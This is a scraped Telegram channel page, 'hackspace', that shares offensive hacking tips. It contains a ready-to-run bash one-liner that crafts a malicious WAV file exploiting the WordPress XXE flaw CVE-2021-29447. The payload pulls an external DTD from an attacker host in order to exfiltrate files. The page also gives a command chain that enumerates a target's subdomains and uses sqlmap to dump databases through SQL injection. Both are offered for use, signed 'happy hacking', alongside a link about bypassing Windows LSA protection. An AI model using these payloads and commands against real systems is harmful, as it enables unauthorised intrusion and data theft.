hackspace – Telegram
hackspace
158 subscribers
279 photos
76 videos
24 files
1K links
hackspace
Download Telegram
CVE-2021-29447 #WordPress XXE: you don't need a wave file to set iXML metadata! bash:

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://attacker/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
find sql injection

subfinder -d target | tee -a domains
cat domain | httpx | tee -a alive.txt
cat alive.txt | waybackurls | tee -a urls
gf sqli urls >> sqli
sqlmap -m sqli --dbs --batch

happy hacking
Bypassing LSA Protection in Userland – Sec Team Blog
https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/
Forwarded from 𝕷𝕺𝕲
Forwarded from 𝕷𝕺𝕲
True)
Forwarded from 𝕷𝕺𝕲
Hexacorn | Blog BYOT – Bring Your Own Telemetry
https://www.hexacorn.com/blog/2021/05/20/byot-bring-your-own-telemetry/